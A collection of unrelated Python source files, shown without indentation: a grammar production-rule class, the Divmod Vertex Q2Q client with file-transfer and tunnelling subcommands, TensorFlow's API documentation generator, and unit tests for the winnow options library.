self._extra_nonterminals = set()
self._extra_terminals = set()
self._productions = []
for left, right in split_sides:
left_side = Nonterminal(left)
for symbol_string in right.split('|'):
right_side = []
for c in symbol_string.strip():
if c.isupper():
right_side.append(Nonterminal(c))
else:
right_side.append(Terminal(c))
self._productions.append(ProductionRule(left_side, right_side))
if not self._productions:
raise ValueError('not production rules were given')
self._start = self._productions[0].left_side
def _check_productions(self, productions):
if not productions:
raise ValueError('no production rules were given')
for p in productions:
if not isinstance(p, ProductionRule):
raise TypeError('production rules must be instances of ProductionRule')
def _init_productions(self, productions):
self._extra_nonterminals = set()
self._extra_terminals = set()
self._productions = list(productions)
self._start = productions[0].left_side
def _check_tuple(self, nonterminals, terminals, productions, start):
# Check nonterminals
for n in nonterminals:
if not isinstance(n, Nonterminal):
raise TypeError('%r is not an instance of Nonterminal' % n)
# Check terminals
for t in terminals:
if not isinstance(t, Terminal):
raise TypeError('%r is not an instance of Terminal' % t)
# Check production rules
if not productions:
raise ValueError('no production rules were given')
for p in productions:
if not isinstance(p, ProductionRule):
raise TypeError('%r is not an instance of ProductionRule' % p)
if not (p.left_side in nonterminals):
raise ValueError('%r is on the left side of a production rule but is not a nonterminal in the grammar' % p.left_side)
for s in p.right_side:
if not (s in terminals or s in nonterminals):
raise ValueError('%r is on the right side of a production rule but is not a symbol in the grammar' % s)
# Check start symbol
if not isinstance(start, Nonterminal):
raise TypeError('start variable %r is not an instance of Nonterminal' % start)
if not (start in nonterminals):
raise ValueError('start variable %r is not a nonterminal in the grammar' % start)
def _init_tuple(self, nonterminals, terminals, productions, start):
# Assign members
self._productions = list(productions)
self._extra_nonterminals = set(nonterminals) - \
self._get_symbols_of_type(Nonterminal)
self._extra_terminals = set(terminals) - \
self._get_symbols_of_type(Terminal)
self._start = start
def __str__(self):
return '\n'.join(str(p) for p in self.productions)
def __repr__(self):
return "%s('''\n%s\n''')" % (self.__class__.__name__, self)
def _html(self, tohtml):
rows = ['<tr><td>%s</td></tr>' % tohtml(p) for p in self.productions]
return '''\
<table>
%s
</table>
''' % '\n '.join(rows)
def html(self):
return self._html(lambda x: x.html())
def dot_html(self):
return self._html(lambda x: x.dot_html())
|
|
# Copyright 2005 Divmod, Inc. See LICENSE file for details
import os
import sys
import struct
import getpass
from twisted.protocols.amp import AMP
from vertex import q2q, sigma
from twisted.python.usage import Options
from twisted.python import log
from twisted.python.failure import Failure
from twisted.internet import reactor
from twisted.internet import protocol
from twisted.internet.task import LoopingCall
from twisted.internet import error
from vertex.q2qadmin import AddUser
class Q2QAuthorize(Options):
def parseArgs(self, who, password=None):
self.who = who
self.password = password
def reportNoCertificate(self, error):
print "No certificate retrieved:", error.getErrorMessage(), "(see ~/.q2q-client-log for details)"
log.err(error)
return None
def postOptions(self):
def go():
self.parent.getService().authorize(
q2q.Q2QAddress.fromString(self.who),
self.password).addErrback(self.reportNoCertificate).addCallback(lambda x: reactor.stop())
if self.password is None:
self.password = getpass.getpass()
reactor.callWhenRunning(go)
self.parent.start()
class BandwidthEstimator:
bufsize = 20
totalBytes = 0
def __init__(self, message, length):
self.length = length
self.message = message
self.estim = []
self.bytes = 0
self.call = LoopingCall(self.estimateBandwidth)
self.call.start(1)
def estimateBandwidth(self):
bytes = self.bytes
self.totalBytes += bytes
self.estim.append(bytes)
self.message("%0.2f k/s (%0.2d%%)"
% ((sum(self.estim) / len(self.estim)) / 1024.,
(float(self.totalBytes) / self.length) * 100))
if len(self.estim) > self.bufsize:
self.estim.pop(0)
self.bytes = 0
def stop(self):
self.call.stop()
self.estimateBandwidth()
self.message("Finished receiving: %d bytes (%d%%)" % (
self.totalBytes, (float(self.totalBytes) / self.length) * 100))
class FileReceiver(protocol.Protocol):
gotLength = False
estimator = None
def connectionMade(self):
self.f = open(self.factory.program.filename, 'wb')
self.factory.program.parent.info("Started receiving...")
def dataReceived(self, data):
if not self.gotLength:
self.length ,= struct.unpack("!Q", data[:8])
data = data[8:]
self.estimator = BandwidthEstimator(self.factory.program.parent.info,
self.length)
self.gotLength = True
self.estimator.bytes += len(data)
self.f.write(data)
def connectionLost(self, reason):
self.f.close()
if self.estimator:
self.estimator.stop()
reactor.stop()
from twisted.protocols.basic import FileSender as fsdr
class FileSender(protocol.Protocol):
def connectionMade(self):
self.file = self.factory.openFile()
self.file.seek(0, 2)
self.length = self.file.tell()
self.file.seek(0)
self.estimator = BandwidthEstimator(self.factory.program.parent.info,
self.length)
self.transport.write(struct.pack("!Q", self.length))
fsdr().beginFileTransfer(
self.file, self).addCallback(
lambda x: self.done())
def done(self):
self.factory.program.parent.info("Done sending data: %d bytes" % (
self.file.tell(),))
self.transport.loseConnection()
def dataReceived(self, data):
print "WTF THE CLIENT IS GETTING DATA", repr(data)
def registerProducer(self, producer, streaming):
self.transport.registerProducer(producer, streaming)
def unregisterProducer(self):
self.transport.unregisterProducer()
def write(self, data):
self.estimator.bytes += len(data)
self.transport.write(data)
def connectionLost(self, reason):
reactor.stop()
class FileSenderFactory(protocol.ClientFactory):
protocol = FileSender
def __init__(self, sendprogram):
self.program = sendprogram
def openFile(self):
return file(self.program.filename, 'r')
def clientConnectionFailed(self, connector, reason):
self.program.parent.info(
"Could not connect: %r" % (reason.getErrorMessage(),))
reactor.stop()
def clientConnectionLost(self, connector, reason):
reason.trap(error.ConnectionDone)
class FileReceiverFactory(protocol.Factory):
def __init__(self, program):
self.program = program
protocol = FileReceiver
class ClientCertificateStore(q2q.DirectoryCertificateStore):
def __init__(self, filepath):
q2q.DirectoryCertificateStore.__init__(self, os.path.expanduser(filepath))
class ClientQ2QService(q2q.Q2QService):
"""
This variant is used by Q2Q clients.
It is I{almost} exactly the same as L{q2q.Q2QService}, except for
implementing a query for a default C{From} address for client connections,
since a client service will generally only register for a single C{From}
address.
"""
def __init__(self, certspath, *a, **kw):
q2q.Q2QService.__init__(self,
certificateStorage=ClientCertificateStore(certspath),
q2qPortnum=0,
*a, **kw)
def getDefaultFrom(self, default=None):
i = self.certificateStorage.localStore.iterkeys()
try:
return i.next()
except StopIteration:
return default
class TunnelProtocol(protocol.Protocol):
def __init__(self, tunnel):
self.tunnel = tunnel
self.buffer = []
def connectionMade(self):
if self.tunnel is not None:
self.tunnel.setTunnel(self)
def dataReceived(self, data):
if self.tunnel is not None:
self.tunnel.transport.write(data)
else:
self.buffer.append(data)
def setTunnel(self, tunnel):
if self.tunnel is None:
self.tunnel = tunnel
self.dataReceived(''.join(self.buffer))
del self.buffer
self.tunnel.setTunnel(self)
class TunnelFactory(protocol.ClientFactory):
def __init__(self, tunnel):
self.tunnel = tunnel
def buildProtocol(self, addr):
return TunnelProtocol(self.tunnel)
def clientConnectionFailed(self, connector, reason):
self.tunnel.transport.loseConnection()
reactor.stop()
clientConnectionLost = clientConnectionFailed
class Q2QTunnel(Options):
optParameters = [
['port', 'p', '13000', 'Port on which to start the TCP server'],
['destination', 'd', None, 'Q2Q address to which to create the tunnel'],
['protocol', 'r', None, 'Q2Q protocol which will operate over the tunnel']]
def postOptions(self):
self.toAddr = q2q.Q2QAddress.fromString(self['destination'])
reactor.listenTCP(int(self['port']), self, interface='127.0.0.1')
self.parent.start()
def doStart(self):
pass
def doStop(self):
pass
def buildProtocol(self, addr):
p = TunnelProtocol(None)
svc = self.parent.getService()
svc.connectQ2Q(self.parent.getFrom(), self.toAddr,
self['protocol'], TunnelFactory(p))
return p
class Q2QReceive(Options):
optParameters = [["port", "p", "41235", "Port to start the listening server on."]]
def parseArgs(self, filename):
self.filename = filename
def postOptions(self):
serv = self.parent.getService()
def pr(x):
return x
def stopit(err):
print "Couldn't Register for File Transfer:", err.getErrorMessage()
log.err(err)
reactor.stop()
serv.listenQ2Q(self.parent.getFrom(),
{'file-transfer': FileReceiverFactory(self)},
"simple file transfer test").addCallback(pr).addErrback(stopit)
self.parent.start()
class Q2QSend(Options):
def parseArgs(self, to, filename):
self.to = to
self.filename = filename
def postOptions(self):
fs = q2q.Q2QAddress.fromString
toAddress = fs(self.to)
fromAddress = self.parent.getFrom()
svc = self.parent.getService()
svc.connectQ2Q(fromAddress, toAddress, 'file-transfer',
FileSenderFactory(self))
self.parent.start()
class TextNexusUI(sigma.BaseNexusUI):
def __init__(self):
sigma.BaseNexusUI.__init__(self)
self.call = LoopingCall(self.report)
self.call.start(5)
def report(self):
print 'Transloads:', len(self.transloads)
for transloadui in self.transloads:
print '---', transloadui.name, '---'
print transloadui.bits.percent()
for peer, mask in transloadui.masks.items():
print peer, mask.percent()
print 'end report'
class Q2QSigma(Options):
def __init__(self, *a, **k):
Options.__init__(self,*a,**k)
self.pushers = []
def opt_push(self, filename):
self.pushers.append([file(filename), filename, []])
def opt_to(self, q2qid):
fs = q2q.Q2QAddress.fromString
addr = fs(q2qid)
self.pushers[-1][-1].append(addr)
def postOptions(self):
nex = sigma.Nexus(self.parent.getService(),
self.parent.getFrom(),
TextNexusUI())
# XXX TODO: there has _GOT_ to be a smarter way to handle text UI for
# this.
for sharefile, sharename, sharepeers in self.pushers:
nex.push(sharefile, sharename, sharepeers)
self.parent.start()
def enregister(svc, newAddress, password):
"""
Register a new account and return a Deferred that fires if it worked.
@param svc: a Q2QService
@param newAddress: a Q2QAddress object
@param password: a shared secret (str)
"""
return svc.connectQ2Q(q2q.Q2QAddress("",""),
q2q.Q2QAddress(newAddress.domain, "accounts"),
'identity-admin',
protocol.ClientFactory.forProtocol(AMP)
).addCallback(
AMP.callRemote,
AddUser,
name=newAddress.resource,
password=password
).addErrback(
Failure.trap,
error.ConnectionDone
)
class Q2QRegister(Options):
synopsis = "<new Q2Q address> <password>"
def parseArgs(self, newaddress, password):
self.newaddress = newaddress
self.password = password
def postOptions(self):
fs = q2q.Q2QAddress.fromString
newAddress = fs(self.newaddress)
svc = self.parent.getService()
def showit(x):
print "%s: %s" % (x.value.__class__, x.getErrorMessage())
enregister(svc, newAddress, self.password).addErrback(
showit).addBoth(lambda nothing: reactor.stop())
self.parent.start()
class Q2QClientProgram(Options):
subCommands = [
['authorize', 'a', Q2QAuthorize, 'Authorize a user'],
['register', 'r', Q2QRegister, 'Create a new user '],
['tunnel', 't', Q2QTunnel, 'Create an SSL tunnel to a given resource'],
['receive', 'l', Q2QReceive, 'Receive for a filetransfer connection'],
['send', 's', Q2QSend, 'Send'],
['sigma', 'g', Q2QSigma, 'Sigma swarming file-transfer']
]
optParameters = [
['from', 'f', None, "Who to send as?"],
['tcp', 'p', None, 'TCP port number'],
['udp', 'u', 0, 'UDP port number'],
['certspath', 'c', "~/.q2qcerts",
"Path to directory full of public/private certificates."],
['logfile', 'l', "~/.q2q-client-log",
"Path to file where logs of client activity will be written."]
]
optFlags = []
service = None
def postOptions(self):
if not self.subCommand:
self.opt_help()
def info(self, message):
sys.stderr.write(">> %s\n" % (message,))
def getService(self):
if self.service is None:
u = self['udp']
if u is not None:
u = int(u)
t = self['tcp']
if t is not None:
t = int(t)
self.service = ClientQ2QService(self['certspath'],
inboundTCPPortnum=t)
return self.service
def getDefaultPath(self):
return os.path.expanduser(os.path.join(self['certspath'], 'default-address'))
def getFrom(self):
fr = self['from']
if not fr:
defpath = self.getDefaultPath()
if os.path.exists(defpath):
fr = file(defpath).read()
else:
fr = self.getService().getDefaultFrom()
if fr is None:
self.info("No default address available, exiting.")
self.info(
" (Try 'q2q register [email protected]; "
"q2q authorize [email protected]')")
sys.exit(19)
self.info("Selected default address:" +fr)
f = file(defpath, 'wb')
f.write(fr)
f.close()
return q2q.Q2QAddress.fromString(fr)
def start(self, portno=None):
import sys
lfname = self['logfile']
if lfname == '-':
lf = sys.stdout
else:
lf = file(os.path.expanduser(lfname), 'ab+')
log.startLogging(lf,
setStdout=False)
srv = self.getService()
from twisted.application.app import startApplication
startApplication(srv, False)
reactor.run()
verbosity = 0
def verboseLogger(self, messageDict):
self.info(' '.join([str(x) for x in messageDict.get('message', [])]))
def opt_verbose(self):
self.verbosity += 1
log.addObserver(log.FileLogObserver(sys.stderr).emit)
opt_v = opt_verbose
|
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Generate docs for the TensorFlow Python API."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import fnmatch
import os
import shutil
import tempfile
import six
from tensorflow.python.util import tf_inspect
from tensorflow.tools.common import public_api
from tensorflow.tools.common import traverse
from tensorflow.tools.docs import doc_controls
from tensorflow.tools.docs import doc_generator_visitor
from tensorflow.tools.docs import parser
from tensorflow.tools.docs import pretty_docs
from tensorflow.tools.docs import py_guide_parser
def write_docs(output_dir,
parser_config,
yaml_toc,
root_title='TensorFlow',
search_hints=True,
site_api_path=''):
"""Write previously extracted docs to disk.
Write a docs page for each symbol included in the indices of parser_config to
a tree of docs at `output_dir`.
Symbols with multiple aliases will have only one page written about
them, which is referenced for all aliases.
Args:
output_dir: Directory to write documentation markdown files to. Will be
created if it doesn't exist.
parser_config: A `parser.ParserConfig` object, containing all the necessary
indices.
yaml_toc: Set to `True` to generate a "_toc.yaml" file.
root_title: The title name for the root level index.md.
search_hints: (bool) include meta-data search hints at the top of each
output file.
site_api_path: The output path relative to the site root. Used in the
`_toc.yaml` and `_redirects.yaml` files.
Raises:
ValueError: if `output_dir` is not an absolute path
"""
# Make output_dir.
if not os.path.isabs(output_dir):
raise ValueError("'output_dir' must be an absolute path.\n"
" output_dir='%s'" % output_dir)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
# These dictionaries are used for table-of-contents generation below
# They will contain, after the for-loop below::
# - module name(string):classes and functions the module contains(list)
module_children = {}
# - symbol name(string):pathname (string)
symbol_to_file = {}
# Collect redirects for an api _redirects.yaml file.
redirects = []
# Parse and write Markdown pages, resolving cross-links (@{symbol}).
for full_name, py_object in six.iteritems(parser_config.index):
parser_config.reference_resolver.current_doc_full_name = full_name
if full_name in parser_config.duplicate_of:
continue
# Methods and some routines are documented only as part of their class.
if not (tf_inspect.ismodule(py_object) or tf_inspect.isclass(py_object) or
parser.is_free_function(py_object, full_name, parser_config.index)):
continue
sitepath = os.path.join('api_docs/python',
parser.documentation_path(full_name)[:-3])
# For TOC, we need to store a mapping from full_name to the file
# we're generating
symbol_to_file[full_name] = sitepath
# For a module, remember the module for the table-of-contents
if tf_inspect.ismodule(py_object):
if full_name in parser_config.tree:
module_children.setdefault(full_name, [])
# For something else that's documented,
# figure out what module it lives in
else:
subname = str(full_name)
while True:
subname = subname[:subname.rindex('.')]
if tf_inspect.ismodule(parser_config.index[subname]):
module_children.setdefault(subname, []).append(full_name)
break
# Generate docs for `py_object`, resolving references.
page_info = parser.docs_for_object(full_name, py_object, parser_config)
path = os.path.join(output_dir, parser.documentation_path(full_name))
directory = os.path.dirname(path)
try:
if not os.path.exists(directory):
os.makedirs(directory)
# This function returns raw bytes in PY2 or unicode in PY3.
if search_hints:
content = [page_info.get_metadata_html()]
else:
content = ['']
content.append(pretty_docs.build_md_page(page_info))
text = '\n'.join(content)
if six.PY3:
text = text.encode('utf-8')
with open(path, 'wb') as f:
f.write(text)
except OSError:
raise OSError(
'Cannot write documentation for %s to %s' % (full_name, directory))
duplicates = parser_config.duplicates.get(full_name, [])
if not duplicates:
continue
duplicates = [item for item in duplicates if item != full_name]
for dup in duplicates:
from_path = os.path.join(site_api_path, dup.replace('.', '/'))
to_path = os.path.join(site_api_path, full_name.replace('.', '/'))
redirects.append((
os.path.join('/', from_path),
os.path.join('/', to_path)))
if redirects:
redirects = sorted(redirects)
template = ('- from: {}\n'
' to: {}\n')
redirects = [template.format(f, t) for f, t in redirects]
api_redirects_path = os.path.join(output_dir, '_redirects.yaml')
with open(api_redirects_path, 'w') as redirect_file:
redirect_file.write('redirects:\n')
redirect_file.write(''.join(redirects))
if yaml_toc:
# Generate table of contents
# Put modules in alphabetical order, case-insensitive
modules = sorted(module_children.keys(), key=lambda a: a.upper())
leftnav_path = os.path.join(output_dir, '_toc.yaml')
with open(leftnav_path, 'w') as f:
# Generate header
f.write('# Automatically generated file; please do not edit\ntoc:\n')
for module in modules:
indent_num = module.count('.')
# Don't list `tf.submodule` inside `tf`
indent_num = max(indent_num, 1)
indent = ' '*indent_num
if indent_num > 1:
# tf.contrib.baysflow.entropy will be under
# tf.contrib->baysflow->entropy
title = module.split('.')[-1]
else:
title = module
header = [
'- title: ' + title,
' section:',
' - title: Overview',
' path: ' + os.path.join('/', site_api_path,
symbol_to_file[module])]
header = ''.join([indent+line+'\n' for line in header])
f.write(header)
symbols_in_module = module_children.get(module, [])
# Sort case-insensitive, if equal sort case sensitive (upper first)
symbols_in_module.sort(key=lambda a: (a.upper(), a))
for full_name in symbols_in_module:
item = [
' - title: ' + full_name[len(module) + 1:],
' path: ' + os.path.join('/', site_api_path,
symbol_to_file[full_name])]
item = ''.join([indent+line+'\n' for line in item])
f.write(item)
# Write a global index containing all full names with links.
with open(os.path.join(output_dir, 'index.md'), 'w') as f:
f.write(
parser.generate_global_index(root_title, parser_config.index,
parser_config.reference_resolver))
def add_dict_to_dict(add_from, add_to):
for key in add_from:
if key in add_to:
add_to[key].extend(add_from[key])
else:
add_to[key] = add_from[key]
# Exclude some libraries in contrib from the documentation altogether.
def _get_default_private_map():
return {
'tf.contrib.autograph': ['utils', 'operators'],
'tf.test': ['mock'],
'tf.compat': ['v1', 'v2'],
}
# Exclude members of some libraries.
def _get_default_do_not_descend_map():
# TODO(markdaoust): Use docs_controls decorators, locally, instead.
return {
'tf': ['cli', 'lib', 'wrappers'],
'tf.contrib': [
'compiler',
'grid_rnn',
# Block contrib.keras to de-clutter the docs
'keras',
'labeled_tensor',
'quantization',
'session_bundle',
'slim',
'solvers',
'specs',
'tensor_forest',
'tensorboard',
'testing',
'tfprof',
],
'tf.contrib.bayesflow': [
'special_math', 'stochastic_gradient_estimators',
'stochastic_variables'
],
'tf.contrib.ffmpeg': ['ffmpeg_ops'],
'tf.contrib.graph_editor': [
'edit', 'match', 'reroute', 'subgraph', 'transform', 'select', 'util'
],
'tf.contrib.keras': ['api', 'python'],
'tf.contrib.layers': ['feature_column', 'summaries'],
'tf.contrib.learn': [
'datasets',
'head',
'graph_actions',
'io',
'models',
'monitors',
'ops',
'preprocessing',
'utils',
],
'tf.contrib.util': ['loader'],
}
class DocControlsAwareCrawler(public_api.PublicAPIVisitor):
"""A `docs_controls` aware API-crawler."""
def _is_private(self, path, name, obj):
if doc_controls.should_skip(obj):
return True
return super(DocControlsAwareCrawler, self)._is_private(path, name, obj)
def extract(py_modules,
private_map,
do_not_descend_map,
visitor_cls=doc_generator_visitor.DocGeneratorVisitor):
"""Extract docs from tf namespace and write them to disk."""
# Traverse the first module.
visitor = visitor_cls(py_modules[0][0])
api_visitor = DocControlsAwareCrawler(visitor)
api_visitor.set_root_name(py_modules[0][0])
add_dict_to_dict(private_map, api_visitor.private_map)
add_dict_to_dict(do_not_descend_map, api_visitor.do_not_descend_map)
traverse.traverse(py_modules[0][1], api_visitor)
# Traverse all py_modules after the first:
for module_name, module in py_modules[1:]:
visitor.set_root_name(module_name)
api_visitor.set_root_name(module_name)
traverse.traverse(module, api_visitor)
return visitor
class _GetMarkdownTitle(py_guide_parser.PyGuideParser):
"""Extract the title from a .md file."""
def __init__(self):
self.title = None
py_guide_parser.PyGuideParser.__init__(self)
def process_title(self, _, title):
if self.title is None: # only use the first title
self.title = title
class _DocInfo(object):
"""A simple struct for holding a doc's url and title."""
def __init__(self, url, title):
self.url = url
self.title = title
def build_doc_index(src_dir):
"""Build an index from a keyword designating a doc to _DocInfo objects."""
doc_index = {}
if not os.path.isabs(src_dir):
raise ValueError("'src_dir' must be an absolute path.\n"
" src_dir='%s'" % src_dir)
if not os.path.exists(src_dir):
raise ValueError("'src_dir' path must exist.\n"
" src_dir='%s'" % src_dir)
for dirpath, _, filenames in os.walk(src_dir):
suffix = os.path.relpath(path=dirpath, start=src_dir)
for base_name in filenames:
if not base_name.endswith('.md'):
continue
title_parser = _GetMarkdownTitle()
title_parser.process(os.path.join(dirpath, base_name))
if title_parser.title is None:
msg = ('`{}` has no markdown title (# title)'.format(
os.path.join(dirpath, base_name)))
raise ValueError(msg)
key_parts = os.path.join(suffix, base_name[:-3]).split('/')
if key_parts[-1] == 'index':
key_parts = key_parts[:-1]
doc_info = _DocInfo(os.path.join(suffix, base_name), title_parser.title)
doc_index[key_parts[-1]] = doc_info
if len(key_parts) > 1:
doc_index['/'.join(key_parts[-2:])] = doc_info
return doc_index
class _GuideRef(object):
def __init__(self, base_name, title, section_title, section_tag):
self.url = 'api_guides/python/' + (('%s#%s' % (base_name, section_tag))
if section_tag else base_name)
self.link_text = (('%s > %s' % (title, section_title))
if section_title else title)
def make_md_link(self, url_prefix):
return '[%s](%s%s)' % (self.link_text, url_prefix, self.url)
class _GenerateGuideIndex(py_guide_parser.PyGuideParser):
"""Turn guide files into an index from symbol name to a list of _GuideRefs."""
def __init__(self):
self.index = {}
py_guide_parser.PyGuideParser.__init__(self)
def process(self, full_path, base_name):
"""Index a file, reading from `full_path`, with `base_name` as the link."""
self.full_path = full_path
self.base_name = base_name
self.title = None
self.section_title = None
self.section_tag = None
py_guide_parser.PyGuideParser.process(self, full_path)
def process_title(self, _, title):
if self.title is None: # only use the first title
self.title = title
def process_section(self, _, section_title, tag):
self.section_title = section_title
self.section_tag = tag
def process_line(self, _, line):
"""Index the file and section of each `symbol` reference."""
for match in parser.AUTO_REFERENCE_RE.finditer(line):
val = self.index.get(match.group(1), [])
val.append(
_GuideRef(self.base_name, self.title, self.section_title,
self.section_tag))
self.index[match.group(1)] = val
def _build_guide_index(guide_src_dir):
"""Return dict: symbol name -> _GuideRef from the files in `guide_src_dir`."""
index_generator = _GenerateGuideIndex()
if os.path.exists(guide_src_dir):
for full_path, base_name in py_guide_parser.md_files_in_dir(guide_src_dir):
index_generator.process(full_path, base_name)
return index_generator.index
class _UpdateTags(py_guide_parser.PyGuideParser):
"""Rewrites a Python guide so that each section has an explicit id tag.
"section" here refers to blocks delimited by second level headings.
"""
def process_section(self, line_number, section_title, tag):
self.replace_line(line_number, '<h2 id="%s">%s</h2>' % (tag, section_title))
def update_id_tags_inplace(src_dir):
"""Set explicit ids on all second-level headings to ensure back-links work.
Args:
src_dir: The directory of md-files to convert (inplace).
"""
tag_updater = _UpdateTags()
for dirpath, _, filenames in os.walk(src_dir):
for base_name in filenames:
if not base_name.endswith('.md'):
continue
full_path = os.path.join(src_dir, dirpath, base_name)
# Tag updater loads the file, makes the replacements, and returns the
# modified file contents
content = tag_updater.process(full_path)
with open(full_path, 'w') as f:
f.write(content)
EXCLUDED = set(['__init__.py', 'OWNERS', 'README.txt'])
def replace_refs(src_dir, output_dir, reference_resolver, file_pattern='*.md'):
"""Fix @{} references in all files under `src_dir` matching `file_pattern`.
A matching directory structure, with the modified files is
written to `output_dir`.
`{"__init__.py","OWNERS","README.txt"}` are skipped.
Files not matching `file_pattern` (using `fnmatch`) are copied with no change.
Also, files in the `api_guides/python` directory get explicit ids set on all
heading-2s to ensure back-links work.
Args:
src_dir: The directory to convert files from.
output_dir: The root directory to write the resulting files to.
reference_resolver: A `parser.ReferenceResolver` to make the replacements.
file_pattern: Only replace references in files matching file_patters,
using fnmatch. Non-matching files are copied unchanged.
"""
# Iterate through all the source files and process them.
for dirpath, _, filenames in os.walk(src_dir):
# How to get from `dirpath` to api_docs/python/
relative_path_to_root = os.path.relpath(
path=os.path.join(src_dir, 'api_docs/python'), start=dirpath)
# Make the directory under output_dir.
new_dir = os.path.join(output_dir,
os.path.relpath(path=dirpath, start=src_dir))
if not os.path.exists(new_dir):
os.makedirs(new_dir)
for base_name in filenames:
if base_name in EXCLUDED:
continue
full_in_path = os.path.join(dirpath, base_name)
# Set the `current_doc_full_name` so bad files can be reported on errors.
reference_resolver.current_doc_full_name = full_in_path
suffix = os.path.relpath(path=full_in_path, start=src_dir)
full_out_path = os.path.join(output_dir, suffix)
# Copy files that do not match the file_pattern, unmodified.
if not fnmatch.fnmatch(base_name, file_pattern):
shutil.copyfile(full_in_path, full_out_path)
continue
with open(full_in_path, 'rb') as f:
content = f.read().decode('utf-8')
content = reference_resolver.replace_references(content,
relative_path_to_root)
with open(full_out_path, 'wb') as f:
f.write(content.encode('utf-8'))
class DocGenerator(object):
"""Main entry point for generating docs."""
def __init__(self):
self.argument_parser = argparse.ArgumentParser()
self._py_modules = None
self._private_map = _get_default_private_map()
self._do_not_descend_map = _get_default_do_not_descend_map()
self.yaml_toc = True
self.argument_parser.add_argument(
'--no_search_hints',
dest='search_hints',
action='store_false',
default=True)
self.argument_parser.add_argument(
'--site_api_path',
type=str, default='',
help='The path from the site-root to api_docs'
'directory for this project')
self.argument_parser.add_argument(
'--api_cache_out_path',
type=str,
default=None,
help='Path to store a json-serialized api-index, so links can be '
'inserted into docs without rebuilding the api_docs')
def add_output_dir_argument(self):
self.argument_parser.add_argument(
'--output_dir',
type=str,
default=None,
required=True,
help='Directory to write docs to.')
def add_src_dir_argument(self):
self.argument_parser.add_argument(
'--src_dir',
type=str,
default=tempfile.mkdtemp(),
required=False,
help='Optional directory of source docs to add api_docs links to')
def add_base_dir_argument(self, default_base_dir):
self.argument_parser.add_argument(
'--base_dir',
type=str,
default=default_base_dir,
help='Base directory to strip from file names referenced in docs.')
def parse_known_args(self):
flags, _ = self.argument_parser.parse_known_args()
return flags
def add_to_private_map(self, d):
add_dict_to_dict(d, self._private_map)
def add_to_do_not_descend_map(self, d):
add_dict_to_dict(d, self._do_not_descend_map)
def set_private_map(self, d):
self._private_map = d
def set_do_not_descend_map(self, d):
self._do_not_descend_map = d
def set_py_modules(self, py_modules):
self._py_modules = py_modules
def py_module_names(self):
if self._py_modules is None:
raise RuntimeError(
'Must call set_py_modules() before running py_module_names().')
return [name for (name, _) in self._py_modules]
def make_reference_resolver(self, visitor, doc_index):
return parser.ReferenceResolver.from_visitor(
visitor, doc_index, py_module_names=self.py_module_names())
def make_parser_config(self, visitor, reference_resolver, guide_index,
base_dir):
return parser.ParserConfig(
reference_resolver=reference_resolver,
duplicates=visitor.duplicates,
duplicate_of=visitor.duplicate_of,
tree=visitor.tree,
index=visitor.index,
reverse_index=visitor.reverse_index,
guide_index=guide_index,
base_dir=base_dir)
def run_extraction(self):
return extract(self._py_modules, self._private_map,
self._do_not_descend_map)
def build(self, flags):
"""Build all the docs.
This produces two outputs
python api docs:
* generated from modules set with `set_py_modules`.
* written to '{FLAGS.output_dir}/api_docs/python/'
non-api docs:
* Everything in '{FLAGS.src_dir}' is copied to '{FLAGS.output_dir}'.
* '@{}' references in '.md' files are replaced with links.
* '.md' files under 'api_guides/python' have explicit ids set for their
second level headings.
Args:
flags:
* src_dir: Where to fetch the non-api-docs.
* base_dir: Base of the docs directory (Used to build correct
relative links).
* output_dir: Where to write the resulting docs.
Returns:
The number of errors encountered while processing.
"""
# Extract the python api from the _py_modules
doc_index = build_doc_index(flags.src_dir)
visitor = self.run_extraction()
reference_resolver = self.make_reference_resolver(visitor, doc_index)
if getattr(flags, 'api_cache_out_path', None):
reference_resolver.to_json_file(flags.api_cache_out_path)
# Build the guide_index for the api_docs back links.
root_title = getattr(flags, 'root_title', 'TensorFlow')
guide_index = _build_guide_index(
os.path.join(flags.src_dir, 'api_guides/python'))
# Write the api docs.
parser_config = self.make_parser_config(visitor, reference_resolver,
guide_index, flags.base_dir)
output_dir = os.path.join(flags.output_dir, 'api_docs/python')
write_docs(
output_dir,
parser_config,
yaml_toc=self.yaml_toc,
root_title=root_title,
search_hints=getattr(flags, 'search_hints', True),
site_api_path=getattr(flags, 'site_api_path', ''))
# Replace all the @{} references in files under `FLAGS.src_dir`
replace_refs(flags.src_dir, flags.output_dir, reference_resolver, '*.md')
# Fix the tags in the guide dir.
guide_dir = os.path.join(flags.output_dir, 'api_guides/python')
if os.path.exists(guide_dir):
update_id_tags_inplace(guide_dir)
# Report all errors found by the reference resolver, and return the error
# code.
parser_config.reference_resolver.log_errors()
return parser_config.reference_resolver.num_errors()
|
|
import unittest
from winnow.utils import json_dumps, json_loads
import winnow
from winnow.models.base import WinnowVersion
from winnow.utils import deep_copy_dict as deepcopy
from winnow.exceptions import OptionsExceptionFailedValidation
from decimal import Decimal
from db import MockKVStore
BASE_PRODUCT = {u"name": u"table",
u"description": u"This is a very nice table",
u"options":{
u"color": [u"red", u"green", u"blue"],
u"size": [u"big", u"small"],
u"tool": [u"cnc", u"laser"],
u"material": [u"wood", u"metal", u"plastic"]
}
}
class TestValidSieve(unittest.TestCase):
def setUp(self):
self.db = MockKVStore()
def test_valid_sieve(self):
version = WinnowVersion.add_doc(self.db, BASE_PRODUCT, {})
class TestSieveAllows(unittest.TestCase):
def setUp(self):
self.db = MockKVStore()
self.base_version = WinnowVersion.add_doc(self.db, BASE_PRODUCT, {})
def test_allows_subset(self):
configured_option = deepcopy(BASE_PRODUCT)
configured_option[u"options"][u"color"] = u"red"
configured_version = WinnowVersion.add_doc(self.db, configured_option, {})
self.assertTrue(winnow.allows(self.base_version, configured_version))
configured_option = deepcopy(BASE_PRODUCT)
configured_option[u"options"][u"color"] = [u"red", u"green"]
# the values for given keys are a subset
configured_version = WinnowVersion.add_doc(self.db, configured_option, {})
self.assertTrue(winnow.allows(self.base_version, configured_version))
self.assertFalse(winnow.allows(configured_version, self.base_version))
self.assertFalse(winnow.is_allowed_by(self.base_version, configured_version))
